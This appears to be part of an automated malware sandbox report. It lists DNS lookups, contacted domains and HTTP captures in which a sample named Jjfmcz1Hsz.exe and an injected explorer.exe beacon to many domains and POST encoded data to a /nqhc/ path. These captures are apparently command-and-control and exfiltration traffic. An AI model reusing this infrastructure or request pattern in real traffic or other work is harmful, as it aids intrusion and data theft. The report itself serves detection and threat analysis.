                                                                                                                                                                          Dec 5, 2022 15:17:06.565293074 CET192.168.11.201.1.1.10xa5c9Standard query (0)www.funknive.chA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:17:17.781482935 CET192.168.11.201.1.1.10xc37Standard query (0)www.noprostatit.storeA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:17:25.842004061 CET192.168.11.201.1.1.10x829aStandard query (0)www.xn--29-oj9ik7b890b.netA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:17:38.620654106 CET192.168.11.201.1.1.10xec95Standard query (0)www.phootka.ruA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:17:50.008730888 CET192.168.11.201.1.1.10x4e5eStandard query (0)www.wellnessprodia.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:19:50.045459032 CET192.168.11.201.1.1.10x6df2Standard query (0)www.westinotion.techA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:20:10.166099072 CET192.168.11.201.1.1.10xe8ffStandard query (0)www.popular.directoryA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:20:33.318905115 CET192.168.11.201.1.1.10x1b29Standard query (0)www.pinwheeleffect.orgA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:20:50.797487020 CET192.168.11.201.1.1.10x2b51Standard query (0)www.t1fbrc.comA (IP address)IN (0x0001)false
                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                          Dec 5, 2022 15:13:33.607448101 CET1.1.1.1192.168.11.200xf6f4No error (0)drive.google.com172.217.23.110A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:13:34.689038038 CET1.1.1.1192.168.11.200xa8cNo error (0)doc-0g-7s-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:13:34.689038038 CET1.1.1.1192.168.11.200xa8cNo error (0)googlehosted.l.googleusercontent.com142.250.184.225A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:14:45.268805027 CET1.1.1.1192.168.11.200x79eNo error (0)www.labour-office.com198.58.118.167A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:14:45.268805027 CET1.1.1.1192.168.11.200x79eNo error (0)www.labour-office.com45.33.23.183A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:14:45.268805027 CET1.1.1.1192.168.11.200x79eNo error (0)www.labour-office.com72.14.185.43A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:14:45.268805027 CET1.1.1.1192.168.11.200x79eNo error (0)www.labour-office.com45.56.79.23A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:14:45.268805027 CET1.1.1.1192.168.11.200x79eNo error (0)www.labour-office.com72.14.178.174A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:14:45.268805027 CET1.1.1.1192.168.11.200x79eNo error (0)www.labour-office.com45.33.30.197A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:14:45.268805027 CET1.1.1.1192.168.11.200x79eNo error (0)www.labour-office.com45.79.19.196A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:14:45.268805027 CET1.1.1.1192.168.11.200x79eNo error (0)www.labour-office.com96.126.123.244A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:14:45.268805027 CET1.1.1.1192.168.11.200x79eNo error (0)www.labour-office.com45.33.20.235A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:14:45.268805027 CET1.1.1.1192.168.11.200x79eNo error (0)www.labour-office.com173.255.194.134A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:14:45.268805027 CET1.1.1.1192.168.11.200x79eNo error (0)www.labour-office.com45.33.18.44A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:14:45.268805027 CET1.1.1.1192.168.11.200x79eNo error (0)www.labour-office.com45.33.2.79A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:15:00.693088055 CET1.1.1.1192.168.11.200xcca7No error (0)www.searchbot.su45.130.41.24A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:15:12.993014097 CET1.1.1.1192.168.11.200xef5cNo error (0)www.youlian.fund154.204.24.45A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:15:25.834120035 CET1.1.1.1192.168.11.200xeaf2No error (0)www.royaltechglobal.comroyaltechglobal.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:15:25.834120035 CET1.1.1.1192.168.11.200xeaf2No error (0)royaltechglobal.com192.185.32.157A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:15:47.859869957 CET1.1.1.1192.168.11.200x389bNo error (0)www.xiaoxiuzhen.com38.55.15.214A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:15:59.856864929 CET1.1.1.1192.168.11.200xd104No error (0)www.gumba.shop75.2.81.212A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:16:11.182837009 CET1.1.1.1192.168.11.200x799dNo error (0)www.botbillionsblaze.websitebotbillionsblaze.websiteCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:16:11.182837009 CET1.1.1.1192.168.11.200x799dNo error (0)botbillionsblaze.website2.57.90.16A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:16:22.741595984 CET1.1.1.1192.168.11.200x594bNo error (0)www.005404.com103.63.2.175A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:16:35.101815939 CET1.1.1.1192.168.11.200xc6bfName error (3)www.westinotion.technonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:16:43.167124987 CET1.1.1.1192.168.11.200xcbdfNo error (0)www.gouldent.site66.29.151.40A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:16:55.384289980 CET1.1.1.1192.168.11.200xdea9No error (0)www.apidachicago.org194.245.148.189A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:17:06.598546982 CET1.1.1.1192.168.11.200xa5c9No error (0)www.funknive.ch185.101.158.239A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:17:17.791981936 CET1.1.1.1192.168.11.200xc37Name error (3)www.noprostatit.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:17:26.280844927 CET1.1.1.1192.168.11.200x829aNo error (0)www.xn--29-oj9ik7b890b.netxn--29-oj9ik7b890b.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:17:26.280844927 CET1.1.1.1192.168.11.200x829aNo error (0)xn--29-oj9ik7b890b.net50.87.192.144A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:17:38.633373022 CET1.1.1.1192.168.11.200xec95No error (0)www.phootka.ru195.24.68.23A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:17:50.498431921 CET1.1.1.1192.168.11.200x4e5eNo error (0)www.wellnessprodia.comwellnessprodia.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:17:50.498431921 CET1.1.1.1192.168.11.200x4e5eNo error (0)wellnessprodia.com192.232.217.125A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:19:50.068917036 CET1.1.1.1192.168.11.200x6df2Name error (3)www.westinotion.technonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:20:10.204616070 CET1.1.1.1192.168.11.200xe8ffNo error (0)www.popular.directory64.190.63.111A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:20:33.541439056 CET1.1.1.1192.168.11.200x1b29No error (0)www.pinwheeleffect.org208.91.197.39A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:20:51.138479948 CET1.1.1.1192.168.11.200x2b51No error (0)www.t1fbrc.com103.91.8.90A (IP address)IN (0x0001)false
                                                                                                                                                                          • drive.google.com
                                                                                                                                                                          • doc-0g-7s-docs.googleusercontent.com
                                                                                                                                                                          • www.labour-office.com
                                                                                                                                                                          • www.searchbot.su
                                                                                                                                                                          • www.youlian.fund
                                                                                                                                                                          • www.royaltechglobal.com
                                                                                                                                                                          • www.xiaoxiuzhen.com
                                                                                                                                                                          • www.gumba.shop
                                                                                                                                                                          • www.botbillionsblaze.website
                                                                                                                                                                          • www.005404.com
                                                                                                                                                                          • www.gouldent.site
                                                                                                                                                                          • www.apidachicago.org
                                                                                                                                                                          • www.funknive.ch
                                                                                                                                                                          • www.xn--29-oj9ik7b890b.net
                                                                                                                                                                          • www.phootka.ru
                                                                                                                                                                          • www.wellnessprodia.com
                                                                                                                                                                          • www.popular.directory
                                                                                                                                                                          • www.pinwheeleffect.org
                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          0192.168.11.2049821172.217.23.110443C:\Users\user\Desktop\Jjfmcz1Hsz.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          1192.168.11.2049823142.250.184.225443C:\Users\user\Desktop\Jjfmcz1Hsz.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          10192.168.11.2049845154.204.24.4580C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:15:20.214121103 CET11209OUTGET /nqhc/?7nWHV=MkuUvDTfzFLprDgv0d/zCzEj80YoaBEagpxYPCZUDQ8arMBq5slv03vCCvkVDe0A6/c8Ceh5Akj/CnOQLB+qucpYk5Fxn1TZTg==&t0D=yFNHS0IX HTTP/1.1
                                                                                                                                                                          Host: www.youlian.fund
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:15:20.499825954 CET11210INHTTP/1.1 200 OK
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:15:20 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 1.0
                                                                                                                                                                          Dec 5, 2022 15:15:20.744004011 CET11210INData Raw: 0a
                                                                                                                                                                          Data Ascii:


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          11192.168.11.2049847192.185.32.15780C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:15:25.949804068 CET11218OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.royaltechglobal.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.royaltechglobal.com
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.royaltechglobal.com/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 63 43 44 37 68 6d 49 2d 4d 78 28 67 7a 47 33 66 35 68 71 30 38 6c 61 6d 77 54 76 44 61 52 38 75 68 76 6e 45 6f 57 6b 63 73 68 7e 34 67 78 35 64 39 38 46 54 59 35 68 79 65 75 33 75 78 2d 45 78 58 73 6e 69 4a 47 31 68 62 35 6f 35 74 58 44 6d 35 54 67 49 38 36 61 65 50 32 6f 6d 6f 73 68 5a 49 70 39 47 72 49 38 42 48 44 74 47 6c 68 47 71 70 34 51 65 4f 31 79 59 7a 68 6e 34 37 47 4f 49 44 50 59 4a 6b 37 34 31 68 69 6f 45 75 39 54 37 5a 4f 7a 53 31 7a 6d 39 47 79 66 31 4e 50 68 71 6b 6f 7a 70 47 4e 34 76 42 6a 33 72 4c 5f 33 4b 64 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=cCD7hmI-Mx(gzG3f5hq08lamwTvDaR8uhvnEoWkcsh~4gx5d98FTY5hyeu3ux-ExXsniJG1hb5o5tXDm5TgI86aeP2omoshZIp9GrI8BHDtGlhGqp4QeO1yYzhn47GOIDPYJk741hioEu9T7ZOzS1zm9Gyf1NPhqkozpGN4vBj3rL_3Kdw).
                                                                                                                                                                          Dec 5, 2022 15:15:26.263753891 CET11219INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:15:26 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                          Link: <https://royaltechglobal.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                          Connection: Upgrade
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          X-Endurance-Cache-Level: 2
                                                                                                                                                                          X-nginx-cache: WordPress
                                                                                                                                                                          Content-Length: 13070
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6b 73 db c6 b2 ed 67 a9 ea fe 87 31 5c 89 a4 2d 02 20 f8 d0 83 22 99 63 2b ce e3 1c 3b ce b1 9c 9d bb 4f 9c 52 0d 80 26 30 d6 60 06 99 19 90 62 74 f4 df 6f 0f 00 be 24 8a 62 64 67 a7 ea ee 4d 5b e4 4c 4f f7 ea d5 ab 57 ff d9 d7 6f cf df ff e3 c7 57 24 35 19 1f ee ee f6 ed 2f 89 99 1a 38 dc 28 87 70 2a 92 81 03 c2 fd e9 c2 d9 dd c9 15 8c d8 f5 c0 91 49 0f 0b 4c ae 7b be 2f 93 dc cb c0 17 fa b9 43 10 60 a7 9f 02 8d 87 bb 3b 84 ec f4 33 30 94 44 29 55 1a cc c0 f9 e9 fd 37 ee 89 b3 fc 24 68 06 03 67 cc 60 92 4b 65 1c 12 49 61 40 60 ea 84 c5 26 1d c4 30 66 11 b8 e5 a5 ae db dd d9 e9 3f 73 5d f2 82 73 c2 04 79 2b 80 5c bc 7a 4b 3a 5e cb 3b f6 02 e2 12 ca a4 06 e9 45 32 23 ae 3b b4 e9 4b 9d 94 0c a5 d1 4b 7d 84 64 22 86 6b 87 f8 77 53 13 10 a0 a8 91 6a 29 fb 4e d3 fd 17 df bf c5 df 83 79 f7 19 8c 8e 14 cb 0d 31 d3 1c 81 68 9e 73 16 51 c3 a4 f0 79 7c f8 51 4b 81 90 9c 6a 8d 6f 25 59 57 47 29 64 d4 4e b8 b3 73 e3 fc 47 d9 ef da 38 3d a7 d2 f8 83 ff c1 af 52 3c a9 12 a7 e1 fc 47 a2 68 9e 3a bd 5f 30 d9 36 c1 cc 97 0a 55 8f 54 91 85 af 99 36 36 87 c5 2b 00 4a 4e 29 37 10 a5 09 97 21 e5 56 a0 0f be f8 2d 8d 3e f8 cf c3 79 31 af 8a 99 81 cc e2 bc e2 90 e1 e4 2b 9d 6c fc 7b 7c df b6 c7 73 be 28 c8 a5 66 56 08 a7 17 54 4d 9c de 02 f8 67 08 7f a4 09 6c 8b 8b 79 76 53 98 f8 9d cc 6c 55 a1 f8 16 55 b7 58 86 e2 96 84 b6 d5 67 3e c1 6d e3 e9 3a dc c5 5a 56 a3 f5 c9 6a 54 e8 0b 4d 7e 90 86 7c 23 0b 11 6f 2b 4c 0d 80 f2 e4 0a c6 4c 16 7a 3b 89 96 c4 f9 75 59 9e b7 2a a1 82 fd 5e fa 7e 6b ab c8 d5 a2 7a 96 77 36 97 bc c7 64 f2 6d 99 bd f5 b2 1b 0e 97 89 5c 96 f5 fb 0c 45 7d 1b 7e 84 c8 6c 8b 32 c9 dd 48 0a 03 c2 7c f0 8b 9c 4b 1a eb 0f 7e ab d9 6a 7d f0 83 e0 83 1f 29 99 e7 10 bb af b1 d3 1b 7a a5 dc c0 cb 45 f2 a4 91 2d 04 16 4e 58 6c 52 34 45 a7 d9 70 52 60 49 6a 9c 5e a7 8d 9b 61 96 7c 39 cd d3 a0 6f 97 17 f4 24 83 3d 9f 40 98 57 55 7f c4 55 48 5d bc a6 22 29 4a fe 0e 08 f7 a7 0b 1b d4 3f 52 65 de 8e b6 1f 09 db 6b 66 c0 da 34 54 40 e3 48 15 59 b8 75 79 3d c3 a2 d2 7a f7 9e 2a 17 b6 c1 b6 eb 9b 11 da de 91 1b 4c bd 56 a4 bc b0 34 53 50 4f 5b 3c 8e f7 eb ed ee ce 4e df d7 91 62 b9 19 da f3 33 d7 25 2f 38 27 4c 90 b7 02 c8 c5 ab b7 c4 75 87 bb bb bb d5 d3 fb 94 69 62 c7 22 f8 2b 73 c3 32 f6 3b c4 64 c2 4c 4a 4c 0a e4 1f 92 6a 53 56 e5 bc 48 10 64 1c 9c 7a 41 40 5c 52 31 f3 fd a9 cd b0 6c fc 89 54 71 ae 40 6b bf ca d5 be 06 e9 97 ed 76 fa 86 19 0e 43 6b 43 22 a4 21 23 59 88 18 51 ee 69 d3 f7 ab 4c 2c c9 c0 50 92 2b 99 83 32 d3 81 23 93 1e 97 11 e5 e0 90 48 0a 03
                                                                                                                                                                          Data Ascii: rksg1\- "c+;OR&0`bto$bdgM[LOWoW$5/8(p*IL{/C`;30D)U7$hg`KeIa@`&0f?s]sy+\zK:^;E2#;KK}d"kwSj)Ny1hsQy|QKjo%YWG)dNsG8=R<Gh:_06UT66+JN)7!V->y1+l{|s(fVTMglyvSlUUXg>m:ZVjTM~|#o+LLz;uY*^~kzw6dm\E}~l2H|K~j})zE-NXlR4EpR`Ij^a|9o$=@WUUH]")J?Rekf4T@HYuy=z*LV4SPO[<Nb3%/8'Luib"+s2;dLJLjSVHdzA@\R1lTq@kvCkC"!#YQiL,P+2#H
                                                                                                                                                                          Dec 5, 2022 15:15:26.263844013 CET11220INData Raw: c2 0c 50 b9 4b 54 8e f8 eb d3 4b a4 a5 ec c7 bb 3f 08 65 25 ba 2c f7 b9 80 7b a8 ba 52 9f 58 9b 0d 1c 9a e7 9c 45 e5 7e 7c 1e 1f 7e d4 b8 27 12 71 aa f5 c0 29 a5 73 75 94 42 46 dd 44 d1 3c 75 86 b8 f8 b2 c1 b5 99 6f df f7 ab 14 0f 97 6d dd 5a 65
                                                                                                                                                                          Data Ascii: PKTK?e%,{RXE~|~'q)suBFD<uomZe~y:<MC5^dUQ"@f~h8LNx%(0h!95FTvb"t~+@M]&.CoS~ska5IF.vy%W+6lcmre#DV
                                                                                                                                                                          Dec 5, 2022 15:15:26.263935089 CET11222INData Raw: ef 07 bd 7d cc 30 86 46 69 99 b4 ef 48 51 3f 1f d8 de ab 2f 25 3b 6d a8 81 28 a5 22 01 a7 b1 44 de 89 64 96 73 30 e0 0c 06 03 5a 4d 72 61 73 ed 62 ee ce 75 70 d0 d8 07 2b bf 2c 54 04 ff fb bf 37 b7 07 5e 24 45 84 e9 d6 ba 5f 45 48 6b e9 7e d0 03
                                                                                                                                                                          Data Ascii: }0FiHQ?/%;m("Dds0ZMrasbup+,T7^$E_EHk~o/Lo{n'LreTd8A{uKg}_Gffi#.vu8L!7;19a30g;T1SH&]J&iz9"]
                                                                                                                                                                          Dec 5, 2022 15:15:26.264007092 CET11223INData Raw: 0b dc 1e 83 94 c7 25 a4 2d cb 2a de 38 08 fa 6e da ab 3d 50 96 3d b2 8a 8c 19 37 2c 90 a5 58 16 b3 65 d5 9c a1 3d 0a a3 e0 b7 82 29 88 5d eb b4 b5 24 e6 76 3a cb 69 1c 33 91 2c 3c 5e 8a dc f4 da 9b d7 25 c5 85 e5 aa 35 43 a2 29 b0 24 35 25 c4 13
                                                                                                                                                                          Data Ascii: %-*8n=P=7,Xe=)]$v:i3,<^%5C)$5%M;bJhEESqFQGReP[4l"j,(#hSrcT,o=%'gt/a@5:[W-A9u(Uf%g,I.UOb5.vQEcV^Fht(YFn7n8=!
                                                                                                                                                                          Dec 5, 2022 15:15:26.264075041 CET11224INData Raw: b5 4f 36 a4 9c 60 4a d7 6b 1e d9 94 db de 24 05 05 fb 1e d3 28 c4 54 16 c6 1d 71 b8 3e b8 49 68 6e 07 ea da 9c 50 c6 53 b2 92 21 27 64 48 3c ca 59 22 38 8c cc 0d 46 28 5a d8 9e cf 32 d4 93 09 97 09 ce 70 ed da 50 85 2f cd 3b 61 10 31 8e f2 28 b8
                                                                                                                                                                          Data Ascii: O6`Jk$(Tq>IhnPS!'dH<Y"8F(Z2pP/;a1(bI:G//-G#M]i-$XKe+IH!$Z+.Xmf!];aI{dLNrrpr28ppgVlbi_&f:{9(>+)@{
                                                                                                                                                                          Dec 5, 2022 15:15:26.264139891 CET11226INData Raw: ca 1f 3e a2 87 17 9c 86 87 6f 45 75 e7 85 a2 75 31 5e 85 91 c2 fe aa 28 65 a8 91 d1 87 5f d3 02 9d 0d 6a 16 1d 4b cc 0e ca 56 81 6d d5 3a 6f 95 97 56 75 69 97 97 76 75 59 62 d4 3a ef 96 97 6e 75 39 2a 2f 47 d5 e5 b8 bc 1c 57 97 93 f2 72 52 5d 4e
                                                                                                                                                                          Data Ascii: >oEuu1^(e_jKVm:oVuivuYb:nu9*/GWrR]Ni=b\sKT[AP~NjD>4:L*fe',T?nK*PKYH\2KfqR^@DL,tr|~NC&hs'YP2mT
                                                                                                                                                                          Dec 5, 2022 15:15:26.264204025 CET11227INData Raw: 7b 24 83 98 d1 c1 1e e5 7c 8f f8 c3 dd 3e 67 e2 8a e0 4e 06 7b 1a 9d 0e 3a 05 30 7b 84 c5 83 bd f1 c4 8d a9 ba 72 43 2e a3 2b b7 7c 75 4b 88 54 c1 68 b0 97 1a 93 f7 7c 5f c9 29 e5 06 a2 34 e1 32 a4 dc 8b 64 e6 4f 72 37 92 c2 80 30 be 49 21 03 ed
                                                                                                                                                                          Data Ascii: {$|>gN{:0{rC.+|uKTh|_)42dOr70I!X>LV{xOSc@]O0|B)63?aT31.Q(AJL5;HP^Gf(;)A"{sY&f:tR-i+r+\8c
                                                                                                                                                                          Dec 5, 2022 15:15:26.264266014 CET11228INData Raw: 0f 95 49 ac 91 87 ff 3f fb fd df 56 0f b6 f6 76 b0 b5 99 83 7f bb f7 9f e2 de bc 50 39 07 77 0a 1c ab fe 55 1d ec 75 3b a7 cd e0 f4 a8 79 7c d2 69 db a6 de e9 c9 49 ab dd 6d 9d 76 82 e0 f8 a8 fb f9 fd ed 1d 23 6e e7 b8 d9 2d fb b4 b1 63 6b 85 c3
                                                                                                                                                                          Data Ascii: I?VvP9wUu;y|iImv#n-ck8A_\24&ZB*oS9Dj0Q_:=L&Ifip&/MZZ><dTh;Qq"%E yh31,d7#4?cP#
                                                                                                                                                                          Dec 5, 2022 15:15:26.264394999 CET11230INData Raw: aa 11 bb c6 e9 0b 5e 91 c5 b0 1b 2c ac 5c 27 d4 fb b9 2c 19 f7 39 5b e4 22 df cc 0d ba 0b a2 b3 20 59 3c 9b 69 0e 6e 54 68 23 97 a3 32 fc 08 91 b9 1f 47 b0 61 9f 92 54 c1 08 ed 64 4c ae 7b be af e4 94 72 03 51 9a 70 19 52 ee 45 32 73 86 df c9 0c
                                                                                                                                                                          Data Ascii: ^,\',9[" Y<inTh#2GaTdL{rQpRE2s>p6]CqZ3iEx4q;H~YV[04yW|V'[2f4Gx$ohd+6+8dvWp,1Ic#rK7#F\j GCj
                                                                                                                                                                          Dec 5, 2022 15:15:26.264470100 CET11231INData Raw: 26 ed fb d5 6b 99 7d 27 75 6f 93 75 5b cd 56 cb 0f 02 7f 6f 48 7e 90 63 c8 42 50 c4 c6 c8 12 e2 1f 86 6b 5a b8 b7 91 91 9f 03 ad 79 6a d1 2e 20 37 9f 87 5d f3 c4 e2 bd 28 92 42 9b 4f 07 3b b6 60 ff 59 f0 e9 a7 43 1d 55 50 02 3e 1d aa 6b a1 de d0
                                                                                                                                                                          Data Ascii: &k}'uou[VoH~cBPkZyj. 7](BO;`YCUP>k@S+?]BB}]/})b9?1p?_BYr3J2 08>q,6CvwfxDyJEyATs@g#
                                                                                                                                                                          Dec 5, 2022 15:15:26.378420115 CET11232INData Raw: e4 a1 db 76 96 11 77 ca 82 f9 08 f9 54 d9 11 49 24 85 a1 0c 07 75 d6 b0 ca 67 f9 59 e8 36 9d 21 ea 5e 8a 3c d3 78 32 99 78 e3 09 1a 21 03 5d 0a 5c 1d fd 91 02 70 63 aa ae dc 89 54 71 ae 40 6b b7 7c f2 89 a1 2a 01 33 d8 bb 0c 39 15 57 7b c3 af 31
                                                                                                                                                                          Data Ascii: vwTI$ugY6!^<x2x!]\pcTq@k|*39W{1Y?,f\^q}n<k#%9/rb#\JrWl,*\?.JHS^-rWXzD,7LsYG:Uti/$I]"q?j#g


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          12192.168.11.2049848192.185.32.15780C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:15:28.091943026 CET11233OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.royaltechglobal.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 527
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.royaltechglobal.com
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.royaltechglobal.com/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 63 43 44 37 68 6d 49 2d 4d 78 28 67 69 57 48 66 34 47 32 30 70 56 61 68 28 7a 76 44 44 68 39 6e 68 76 72 45 6f 58 67 4d 35 48 75 34 68 51 4a 64 38 2d 39 54 56 5a 68 79 4b 2d 33 72 7e 65 45 2d 58 73 71 58 4a 44 4e 68 62 39 41 35 73 68 58 6d 28 6a 67 4c 6b 4b 61 64 49 32 6f 6a 35 38 68 48 49 70 68 53 72 4a 34 42 41 77 70 47 6b 6a 75 71 7e 5a 51 5a 45 31 79 6b 36 42 6e 37 78 6d 4f 38 44 4f 6b 33 6b 36 51 6c 67 52 30 45 67 38 7a 37 59 4f 7a 54 75 7a 6d 36 45 79 66 72 44 39 4d 63 70 34 48 46 61 74 45 4d 4f 53 47 38 4a 4f 47 57 42 71 53 51 66 59 65 4d 30 34 32 48 71 50 59 32 44 48 37 4d 44 61 34 4d 63 2d 53 70 74 70 7e 63 74 4d 51 72 6c 4f 75 49 72 64 66 55 4e 65 36 30 32 61 54 4d 79 75 7a 54 28 39 4a 33 54 45 70 31 78 71 62 79 44 74 28 52 70 6f 5a 34 7e 48 63 38 52 64 52 6d 34 57 4d 39 4a 69 61 7a 30 4d 43 50 6f 33 6a 39 42 77 7e 61 77 56 76 53 6d 55 6f 36 52 7a 32 2d 67 54 53 46 37 46 72 71 57 51 55 46 72 6d 43 44 54 30 34 41 36 64 28 44 31 6a 54 47 36 4a 65 4c 6a 4d 41 59 4a 59 31 6c 37 63 67 7a 62 74 4c 47 67 72 51 30 63 76 43 44 68 6a 32 68 57 62 4c 42 72 2d 6d 45 4a 44 70 4b 4c 65 73 50 66 48 38 4c 74 55 4a 66 71 70 33 61 4b 6e 42 4a 49 68 28 4f 66 6a 48 55 7e 50 75 50 66 69 44 4f 34 52 73 49 43 45 34 64 63 49 4f 51 51 57 4d 48 54 62 31 78 5a 46 4e 63 72 33 37 72 4b 53 7a 35 41 4e 53 58 37 7a 46 66 6e 36 6b 59 33 64 58 77 51 53 6e 7a 7a 51 63 59 62 57 4d 77 62 58 28 77 6c 33 57 35 6c 63 76 53 35 35 51 79 43 31 5a 77 6a 54 64 43 48 5f 4d 55 48 56 6d 70 62 6e 43 53 70 6e 39 48 55 63 36 33 43 61 4e 53 4e 46 4b 54 53 34 77 42 66 73 6f 2e 00 00 00 00 00 00 00 00
